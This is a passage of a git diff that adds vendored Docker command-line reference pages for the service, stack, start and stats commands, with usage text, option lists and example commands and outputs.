+* [service scale](service_scale.md)
+* [service ps](service_ps.md)
+* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md
new file mode 100644
index 0000000000..61abb15f67
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md
@@ -0,0 +1,161 @@
+---
+title: "service ps"
+description: "The service ps command description and usage"
+keywords: "service, tasks, ps"
+aliases: ["/engine/reference/commandline/service_tasks/"]
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# service ps
+
+```Markdown
+Usage:  docker service ps [OPTIONS] SERVICE
+
+List the tasks of a service
+
+Options:
+  -f, --filter filter   Filter output based on conditions provided
+      --help            Print usage
+      --no-resolve      Do not map IDs to Names
+      --no-trunc        Do not truncate output
+  -q, --quiet           Only display task IDs
+```
+
+Lists the tasks that are running as part of the specified service. This command
+has to be run targeting a manager node.
+
+## Examples
+
+### Listing the tasks that are part of a service
+
+The following command shows all the tasks that are part of the `redis` service:
+
+```bash
+$ docker service ps redis
+
+ID             NAME      IMAGE        NODE      DESIRED STATE  CURRENT STATE          ERROR  PORTS
+0qihejybwf1x   redis.1   redis:3.0.5  manager1  Running        Running 8 seconds
+bk658fpbex0d   redis.2   redis:3.0.5  worker2   Running        Running 9 seconds
+5ls5s5fldaqg   redis.3   redis:3.0.5  worker1   Running        Running 9 seconds
+8ryt076polmc   redis.4   redis:3.0.5  worker1   Running        Running 9 seconds
+1x0v8yomsncd   redis.5   redis:3.0.5  manager1  Running        Running 8 seconds
+71v7je3el7rr   redis.6   redis:3.0.5  worker2   Running        Running 9 seconds
+4l3zm9b7tfr7   redis.7   redis:3.0.5  worker2   Running        Running 9 seconds
+9tfpyixiy2i7   redis.8   redis:3.0.5  worker1   Running        Running 9 seconds
+3w1wu13yupln   redis.9   redis:3.0.5  manager1  Running        Running 8 seconds
+8eaxrb2fqpbn   redis.10  redis:3.0.5  manager1  Running        Running 8 seconds
+```
+
+In addition to _running_ tasks, the output also shows the task history. For
+example, after updating the service to use the `redis:3.0.6` image, the output
+may look like this:
+
+```bash
+$ docker service ps redis
+
+ID            NAME         IMAGE        NODE      DESIRED STATE  CURRENT STATE                   ERROR  PORTS
+50qe8lfnxaxk  redis.1      redis:3.0.6  manager1  Running        Running 6 seconds ago
+ky2re9oz86r9   \_ redis.1  redis:3.0.5  manager1  Shutdown       Shutdown 8 seconds ago
+3s46te2nzl4i  redis.2      redis:3.0.6  worker2   Running        Running less than a second ago
+nvjljf7rmor4   \_ redis.2  redis:3.0.6  worker2   Shutdown       Rejected 23 seconds ago        "No such image: redis@sha256:6…"
+vtiuz2fpc0yb   \_ redis.2  redis:3.0.5  worker2   Shutdown       Shutdown 1 second ago
+jnarweeha8x4  redis.3      redis:3.0.6  worker1   Running        Running 3 seconds ago
+vs448yca2nz4   \_ redis.3  redis:3.0.5  worker1   Shutdown       Shutdown 4 seconds ago
+jf1i992619ir  redis.4      redis:3.0.6  worker1   Running        Running 10 seconds ago
+blkttv7zs8ee   \_ redis.4  redis:3.0.5  worker1   Shutdown       Shutdown 11 seconds ago
+```
+
+The number of items in the task history is determined by the
+`--task-history-limit` option that was set when initializing the swarm. You can
+change the task history retention limit using the
+[`docker swarm update`](swarm_update.md) command.
+
+When deploying a service, docker resolves the digest for the service's
+image, and pins the service to that digest. The digest is not shown by
+default, but is printed if `--no-trunc` is used. The `--no-trunc` option
+also shows the non-truncated task ID, and error-messages, as can be seen below;
+
+```bash
+$ docker service ps --no-trunc redis
+
+ID                          NAME         IMAGE                                                                                NODE      DESIRED STATE  CURRENT STATE            ERROR                                                                                           PORTS
+50qe8lfnxaxksi9w2a704wkp7   redis.1      redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842  manager1  Running        Running 5 minutes ago
+ky2re9oz86r9556i2szb8a8af   \_ redis.1   redis:3.0.5@sha256:f8829e00d95672c48c60f468329d6693c4bdd28d1f057e755f8ba8b40008682e  worker2   Shutdown       Shutdown 5 minutes ago
+bk658fpbex0d57cqcwoe3jthu   redis.2      redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842  worker2   Running        Running 5 seconds
+nvjljf7rmor4htv7l8rwcx7i7   \_ redis.2   redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842  worker2   Shutdown       Rejected 5 minutes ago   "No such image: redis@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842"
+```
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there
+is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`).
+Multiple filter flags are combined as an `OR` filter. For example,
+`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks.
+
+The currently supported filters are:
+
+* [id](#id)
+* [name](#name)
+* [node](#node)
+* [desired-state](#desired-state)
+
+
+#### ID
+
+The `id` filter matches on all or a prefix of a task's ID.
+
+```bash
+$ docker service ps -f "id=8" redis
+
+ID             NAME      IMAGE        NODE      DESIRED STATE  CURRENT STATE      ERROR  PORTS
+8ryt076polmc   redis.4   redis:3.0.6  worker1   Running        Running 9 seconds
+8eaxrb2fqpbn   redis.10  redis:3.0.6  manager1  Running        Running 8 seconds
+```
+
+#### Name
+
+The `name` filter matches on task names.
+
+```bash
+$ docker service ps -f "name=redis.1" redis
+ID            NAME     IMAGE        NODE      DESIRED STATE  CURRENT STATE      ERROR  PORTS
+qihejybwf1x5  redis.1  redis:3.0.6  manager1  Running        Running 8 seconds
+```
+
+
+#### Node
+
+The `node` filter matches on a node name or a node ID.
+
+```bash
+$ docker service ps -f "node=manager1" redis
+ID            NAME      IMAGE        NODE      DESIRED STATE  CURRENT STATE      ERROR  PORTS
+0qihejybwf1x  redis.1   redis:3.0.6  manager1  Running        Running 8 seconds
+1x0v8yomsncd  redis.5   redis:3.0.6  manager1  Running        Running 8 seconds
+3w1wu13yupln  redis.9   redis:3.0.6  manager1  Running        Running 8 seconds
+8eaxrb2fqpbn  redis.10  redis:3.0.6  manager1  Running        Running 8 seconds
+```
+
+
+#### desired-state
+
+The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`.
+
+
+## Related information
+
+* [service create](service_create.md)
+* [service inspect](service_inspect.md)
+* [service logs](service_logs.md)
+* [service ls](service_ls.md)
+* [service rm](service_rm.md)
+* [service scale](service_scale.md)
+* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md
new file mode 100644
index 0000000000..d0ba90b26d
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md
@@ -0,0 +1,55 @@
+---
+title: "service rm"
+description: "The service rm command description and usage"
+keywords: "service, rm"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# service rm
+
+```Markdown
+Usage:	docker service rm SERVICE [SERVICE...]
+
+Remove one or more services
+
+Aliases:
+  rm, remove
+
+Options:
+      --help   Print usage
+```
+
+Removes the specified services from the swarm. This command has to be run
+targeting a manager node.
+
+For example, to remove the redis service:
+
+```bash
+$ docker service rm redis
+redis
+$ docker service ls
+ID  NAME  MODE  REPLICAS  IMAGE
+```
+
+> **Warning**: Unlike `docker rm`, this command does not ask for confirmation
+> before removing a running service.
+
+
+
+## Related information
+
+* [service create](service_create.md)
+* [service inspect](service_inspect.md)
+* [service logs](service_logs.md)
+* [service ls](service_ls.md)
+* [service scale](service_scale.md)
+* [service ps](service_ps.md)
+* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md
new file mode 100644
index 0000000000..64075ed092
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md
@@ -0,0 +1,96 @@
+---
+title: "service scale"
+description: "The service scale command description and usage"
+keywords: "service, scale"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# service scale
+
+```markdown
+Usage:  docker service scale SERVICE=REPLICAS [SERVICE=REPLICAS...]
+
+Scale one or multiple replicated services
+
+Options:
+      --help   Print usage
+```
+
+## Examples
+
+### Scale a service
+
+The scale command enables you to scale one or more replicated services either up
+or down to the desired number of replicas. This command cannot be applied on
+services which are global mode. The command will return immediately, but the
+actual scaling of the service may take some time. To stop all replicas of a
+service while keeping the service active in the swarm you can set the scale to 0.
+
+For example, the following command scales the "frontend" service to 50 tasks.
+
+```bash
+$ docker service scale frontend=50
+frontend scaled to 50
+```
+
+The following command tries to scale a global service to 10 tasks and returns an error.
+
+```
+$ docker service create --mode global --name backend backend:latest
+b4g08uwuairexjub6ome6usqh
+$ docker service scale backend=10
+backend: scale can only be used with replicated mode
+```
+
+Directly afterwards, run `docker service ls`, to see the actual number of
+replicas.
+
+```bash
+$ docker service ls --filter name=frontend
+
+ID            NAME      MODE        REPLICAS  IMAGE
+3pr5mlvu3fh9  frontend  replicated  15/50     nginx:alpine
+```
+
+You can also scale a service using the [`docker service update`](service_update.md)
+command. The following commands are equivalent:
+
+```bash
+$ docker service scale frontend=50
+$ docker service update --replicas=50 frontend
+```
+
+### Scale multiple services
+
+The `docker service scale` command allows you to set the desired number of
+tasks for multiple services at once. The following example scales both the
+backend and frontend services:
+
+```bash
+$ docker service scale backend=3 frontend=5
+backend scaled to 3
+frontend scaled to 5
+
+$ docker service ls
+ID            NAME      MODE        REPLICAS  IMAGE
+3pr5mlvu3fh9  frontend  replicated  5/5       nginx:alpine
+74nzcxxjv6fq  backend   replicated  3/3       redis:3.0.6
+```
+
+## Related information
+
+* [service create](service_create.md)
+* [service inspect](service_inspect.md)
+* [service logs](service_logs.md)
+* [service ls](service_ls.md)
+* [service rm](service_rm.md)
+* [service ps](service_ps.md)
+* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md
new file mode 100644
index 0000000000..301a0eabe8
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md
@@ -0,0 +1,181 @@
+---
+title: "service update"
+description: "The service update command description and usage"
+keywords: "service, update"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# service update
+
+```Markdown
+Usage:  docker service update [OPTIONS] SERVICE
+
+Update a service
+
+Options:
+      --args string                      Service command args
+      --constraint-add list              Add or update a placement constraint (default [])
+      --constraint-rm list               Remove a constraint (default [])
+      --container-label-add list         Add or update a container label (default [])
+      --container-label-rm list          Remove a container label by its key (default [])
+      --dns-add list                     Add or update a custom DNS server (default [])
+      --dns-option-add list              Add or update a DNS option (default [])
+      --dns-option-rm list               Remove a DNS option (default [])
+      --dns-rm list                      Remove a custom DNS server (default [])
+      --dns-search-add list              Add or update a custom DNS search domain (default [])
+      --dns-search-rm list               Remove a DNS search domain (default [])
+      --endpoint-mode string             Endpoint mode (vip or dnsrr)
+      --env-add list                     Add or update an environment variable (default [])
+      --env-rm list                      Remove an environment variable (default [])
+      --force                            Force update even if no changes require it
+      --group-add list                   Add an additional supplementary user group to the container (default [])
+      --group-rm list                    Remove a previously added supplementary user group from the container (default [])
+      --health-cmd string                Command to run to check health
+      --health-interval duration         Time between running the check (ns|us|ms|s|m|h)
+      --health-retries int               Consecutive failures needed to report unhealthy
+      --health-timeout duration          Maximum time to allow one check to run (ns|us|ms|s|m|h)
+      --help                             Print usage
+      --host-add list                    Add or update a custom host-to-IP mapping (host:ip) (default [])
+      --host-rm list                     Remove a custom host-to-IP mapping (host:ip) (default [])
+      --hostname string                  Container hostname
+      --image string                     Service image tag
+      --label-add list                   Add or update a service label (default [])
+      --label-rm list                    Remove a label by its key (default [])
+      --limit-cpu decimal                Limit CPUs (default 0.000)
+      --limit-memory bytes               Limit Memory (default 0 B)
+      --log-driver string                Logging driver for service
+      --log-opt list                     Logging driver options (default [])
+      --mount-add mount                  Add or update a mount on a service
+      --mount-rm list                    Remove a mount by its target path (default [])
+      --no-healthcheck                   Disable any container-specified HEALTHCHECK
+      --publish-add port                 Add or update a published port
+      --publish-rm port                  Remove a published port by its target port
+      --replicas uint                    Number of tasks
+      --reserve-cpu decimal              Reserve CPUs (default 0.000)
+      --reserve-memory bytes             Reserve Memory (default 0 B)
+      --restart-condition string         Restart when condition is met (none, on-failure, or any)
+      --restart-delay duration           Delay between restart attempts (ns|us|ms|s|m|h)
+      --restart-max-attempts uint        Maximum number of restarts before giving up
+      --restart-window duration          Window used to evaluate the restart policy (ns|us|ms|s|m|h)
+      --rollback                         Rollback to previous specification
+      --secret-add secret                Add or update a secret on a service
+      --secret-rm list                   Remove a secret (default [])
+      --stop-grace-period duration       Time to wait before force killing a container (ns|us|ms|s|m|h)
+  -t, --tty                              Allocate a pseudo-TTY
+      --update-delay duration            Delay between updates (ns|us|ms|s|m|h) (default 0s)
+      --update-failure-action string     Action on update failure (pause|continue) (default "pause")
+      --update-max-failure-ratio float   Failure rate to tolerate during an update
+      --update-monitor duration          Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s)
+      --update-parallelism uint          Maximum number of tasks updated simultaneously (0 to update all at once) (default 1)
+  -u, --user string                      Username or UID (format: <name|uid>[:<group|gid>])
+      --with-registry-auth               Send registry authentication details to swarm agents
+  -w, --workdir string                   Working directory inside the container
+```
+
+Updates a service as described by the specified parameters. This command has to be run targeting a manager node.
+The parameters are the same as [`docker service create`](service_create.md). Please look at the description there
+for further information.
+
+Normally, updating a service will only cause the service's tasks to be replaced with new ones if a change to the
+service requires recreating the tasks for it to take effect. For example, only changing the
+`--update-parallelism` setting will not recreate the tasks, because the individual tasks are not affected by this
+setting. However, the `--force` flag will cause the tasks to be recreated anyway. This can be used to perform a
+rolling restart without any changes to the service parameters.
+
+## Examples
+
+### Update a service
+
+```bash
+$ docker service update --limit-cpu 2 redis
+```
+
+### Perform a rolling restart with no parameter changes
+
+```bash
+$ docker service update --force --update-parallelism 1 --update-delay 30s redis
+```
+
+In this example, the `--force` flag causes the service's tasks to be shut down
+and replaced with new ones even though none of the other parameters would
+normally cause that to happen. The `--update-parallelism 1` setting ensures
+that only one task is replaced at a time (this is the default behavior). The
+`--update-delay 30s` setting introduces a 30 second delay between tasks, so
+that the rolling restart happens gradually.
+
+### Adding and removing mounts
+
+Use the `--mount-add` or `--mount-rm` options add or remove a service's bind-mounts
+or volumes.
+
+The following example creates a service which mounts the `test-data` volume to
+`/somewhere`. The next step updates the service to also mount the `other-volume`
+volume to `/somewhere-else`volume, The last step unmounts the `/somewhere` mount
+point, effectively removing the `test-data` volume. Each command returns the
+service name.
+
+- The `--mount-add` flag takes the same parameters as the `--mount` flag on
+  `service create`. Refer to the [volumes and
+  bind-mounts](service_create.md#volumes-and-bind-mounts-mount) section in the
+  `service create` reference for details.
+
+- The `--mount-rm` flag takes the `target` path of the mount.
+
+```bash
+$ docker service create \
+    --name=myservice \
+    --mount \
+      type=volume,source=test-data,target=/somewhere \
+    nginx:alpine \
+    myservice
+
+myservice
+
+$ docker service update \
+    --mount-add \
+      type=volume,source=other-volume,target=/somewhere-else \
+    myservice
+
+myservice
+
+$ docker service update --mount-rm /somewhere myservice
+
+myservice
+```
+
+### Adding and removing secrets
+
+Use the `--secret-add` or `--secret-rm` options add or remove a service's
+secrets.
+
+The following example adds a secret named `ssh-2` and removes `ssh-1`:
+
+```bash
+$ docker service update \
+    --secret-add source=ssh-2,target=ssh-2 \
+    --secret-rm ssh-1 \
+    myservice
+```
+
+### Update services using templates
+
+Some flags of `service update` support the use of templating.
+See [`service create`](./service_create.md#templating) for the reference.
+
+## Related information
+
+* [service create](service_create.md)
+* [service inspect](service_inspect.md)
+* [service logs](service_logs.md)
+* [service ls](service_ls.md)
+* [service ps](service_ps.md)
+* [service rm](service_rm.md)
+* [service scale](service_scale.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md
new file mode 100644
index 0000000000..037feaebd7
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md
@@ -0,0 +1,98 @@
+---
+title: "stack deploy"
+description: "The stack deploy command description and usage"
+keywords: "stack, deploy, up"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# stack deploy
+
+```markdown
+Usage:  docker stack deploy [OPTIONS] STACK
+
+Deploy a new stack or update an existing stack
+
+Aliases:
+  deploy, up
+
+Options:
+      --bundle-file string    Path to a Distributed Application Bundle file
+  -c, --compose-file string   Path to a Compose file
+      --help                  Print usage
+      --with-registry-auth    Send registry authentication details to Swarm agents
+```
+
+Create and update a stack from a `compose` or a `dab` file on the swarm. This command
+has to be run targeting a manager node.
+
+## Compose file
+
+The `deploy` command supports compose file version `3.0` and above."
+
+```bash
+$ docker stack deploy --compose-file docker-compose.yml vossibility
+Ignoring unsupported options: links
+
+Creating network vossibility_vossibility
+Creating network vossibility_default
+Creating service vossibility_nsqd
+Creating service vossibility_logstash
+Creating service vossibility_elasticsearch
+Creating service vossibility_kibana
+Creating service vossibility_ghollector
+Creating service vossibility_lookupd
+```
+
+You can verify that the services were correctly created
+
+```
+$ docker service ls
+ID            NAME                               MODE        REPLICAS  IMAGE
+29bv0vnlm903  vossibility_lookupd                replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
+4awt47624qwh  vossibility_nsqd                   replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
+4tjx9biia6fs  vossibility_elasticsearch          replicated  1/1       elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa
+7563uuzr9eys  vossibility_kibana                 replicated  1/1       kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03
+9gc5m4met4he  vossibility_logstash               replicated  1/1       logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe
+axqh55ipl40h  vossibility_vossibility-collector  replicated  1/1       icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba
+```
+
+## DAB file
+
+```bash
+$ docker stack deploy --bundle-file vossibility-stack.dab vossibility
+Loading bundle from vossibility-stack.dab
+Creating service vossibility_elasticsearch
+Creating service vossibility_kibana
+Creating service vossibility_logstash
+Creating service vossibility_lookupd
+Creating service vossibility_nsqd
+Creating service vossibility_vossibility-collector
+```
+
+You can verify that the services were correctly created:
+
+```bash
+$ docker service ls
+ID            NAME                               MODE        REPLICAS  IMAGE
+29bv0vnlm903  vossibility_lookupd                replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
+4awt47624qwh  vossibility_nsqd                   replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
+4tjx9biia6fs  vossibility_elasticsearch          replicated  1/1       elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa
+7563uuzr9eys  vossibility_kibana                 replicated  1/1       kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03
+9gc5m4met4he  vossibility_logstash               replicated  1/1       logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe
+axqh55ipl40h  vossibility_vossibility-collector  replicated  1/1       icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba
+```
+
+## Related information
+
+* [stack ls](stack_ls.md)
+* [stack ps](stack_ps.md)
+* [stack rm](stack_rm.md)
+* [stack services](stack_services.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md
new file mode 100644
index 0000000000..05c7215492
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md
@@ -0,0 +1,47 @@
+---
+title: "stack ls"
+description: "The stack ls command description and usage"
+keywords: "stack, ls"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# stack ls
+
+```markdown
+Usage:	docker stack ls
+
+List stacks
+
+Aliases:
+  ls, list
+
+Options:
+      --help   Print usage
+```
+
+Lists the stacks.
+
+For example, the following command shows all stacks and some additional information:
+
+```bash
+$ docker stack ls
+
+ID                 SERVICES
+vossibility-stack  6
+myapp              2
+```
+
+## Related information
+
+* [stack deploy](stack_deploy.md)
+* [stack ps](stack_ps.md)
+* [stack rm](stack_rm.md)
+* [stack services](stack_services.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md
new file mode 100644
index 0000000000..101e9feb11
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md
@@ -0,0 +1,51 @@
+---
+title: "stack ps"
+description: "The stack ps command description and usage"
+keywords: "stack, ps"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# stack ps
+
+```markdown
+Usage:  docker stack ps [OPTIONS] STACK
+
+List the tasks in the stack
+
+Options:
+  -f, --filter filter   Filter output based on conditions provided
+      --help            Print usage
+      --no-resolve      Do not map IDs to Names
+      --no-trunc        Do not truncate output
+```
+
+Lists the tasks that are running as part of the specified stack. This
+command has to be run targeting a manager node.
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there
+is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`).
+Multiple filter flags are combined as an `OR` filter. For example,
+`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks.
+
+The currently supported filters are:
+
+* id
+* name
+* desired-state
+
+## Related information
+
+* [stack deploy](stack_deploy.md)
+* [stack ls](stack_ls.md)
+* [stack rm](stack_rm.md)
+* [stack services](stack_services.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md
new file mode 100644
index 0000000000..fd639978ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md
@@ -0,0 +1,38 @@
+---
+title: "stack rm"
+description: "The stack rm command description and usage"
+keywords: "stack, rm, remove, down"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# stack rm
+
+```markdown
+Usage:  docker stack rm STACK
+
+Remove the stack
+
+Aliases:
+  rm, remove, down
+
+Options:
+      --help   Print usage
+```
+
+Remove the stack from the swarm. This command has to be run targeting
+a manager node.
+
+## Related information
+
+* [stack deploy](stack_deploy.md)
+* [stack ls](stack_ls.md)
+* [stack ps](stack_ps.md)
+* [stack services](stack_services.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md
new file mode 100644
index 0000000000..62779b4aa1
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md
@@ -0,0 +1,70 @@
+---
+title: "stack services"
+description: "The stack services command description and usage"
+keywords: "stack, services"
+advisory: "experimental"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# stack services (experimental)
+
+```markdown
+Usage:	docker stack services [OPTIONS] STACK
+
+List the services in the stack
+
+Options:
+  -f, --filter value   Filter output based on conditions provided
+      --help           Print usage
+  -q, --quiet          Only display IDs
+```
+
+Lists the services that are running as part of the specified stack. This
+command has to be run targeting a manager node.
+
+For example, the following command shows all services in the `myapp` stack:
+
+```bash
+$ docker stack services myapp
+
+ID            NAME            REPLICAS  IMAGE                                                                          COMMAND
+7be5ei6sqeye  myapp_web       1/1       nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f
+dn7m7nhhfb9y  myapp_db        1/1       mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539
+```
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there
+is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`).
+Multiple filter flags are combined as an `OR` filter.
+
+The following command shows both the `web` and `db` services:
+
+```bash
+$ docker stack services --filter name=myapp_web --filter name=myapp_db myapp
+
+ID            NAME            REPLICAS  IMAGE                                                                          COMMAND
+7be5ei6sqeye  myapp_web       1/1       nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f
+dn7m7nhhfb9y  myapp_db        1/1       mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539
+```
+
+The currently supported filters are:
+
+* id / ID (`--filter id=7be5ei6sqeye`, or `--filter ID=7be5ei6sqeye`)
+* name (`--filter name=myapp_web`)
+* label (`--filter label=key=value`)
+
+## Related information
+
+* [stack deploy](stack_deploy.md)
+* [stack ls](stack_ls.md)
+* [stack ps](stack_ps.md)
+* [stack rm](stack_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/start.md b/vendor/github.com/docker/docker/docs/reference/commandline/start.md
new file mode 100644
index 0000000000..980bce9585
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/start.md
@@ -0,0 +1,28 @@
+---
+title: "start"
+description: "The start command description and usage"
+keywords: "Start, container, stopped"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# start
+
+```markdown
+Usage:  docker start [OPTIONS] CONTAINER [CONTAINER...]
+
+Start one or more stopped containers
+
+Options:
+  -a, --attach               Attach STDOUT/STDERR and forward signals
+      --detach-keys string   Override the key sequence for detaching a container
+      --help                 Print usage
+  -i, --interactive          Attach container's STDIN
+```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stats.md b/vendor/github.com/docker/docker/docs/reference/commandline/stats.md
new file mode 100644
index 0000000000..f5d0d54f35
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/stats.md
@@ -0,0 +1,117 @@
+---
+title: "stats"
+description: "The stats command description and usage"
+keywords: "container, resource, statistics"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# stats
+
+```markdown
+Usage:  docker stats [OPTIONS] [CONTAINER...]
+
+Display a live stream of container(s) resource usage statistics
+
+Options:
+  -a, --all             Show all containers (default shows just running)
+      --format string   Pretty-print images using a Go template
+      --help            Print usage
+      --no-stream       Disable streaming stats and only pull the first result
+```
+
+The `docker stats` command returns a live data stream for running containers. To limit data to one or more specific containers, specify a list of container names or ids separated by a space. You can specify a stopped container but stopped containers do not return any data.
+
+If you want more detailed information about a container's resource usage, use the `/containers/(id)/stats` API endpoint.
+
+## Examples
+
+Running `docker stats` on all running containers against a Linux daemon.
+
+    $ docker stats
+    CONTAINER           CPU %               MEM USAGE / LIMIT     MEM %               NET I/O             BLOCK I/O
+    1285939c1fd3        0.07%               796 KiB / 64 MiB        1.21%               788 B / 648 B       3.568 MB / 512 KB
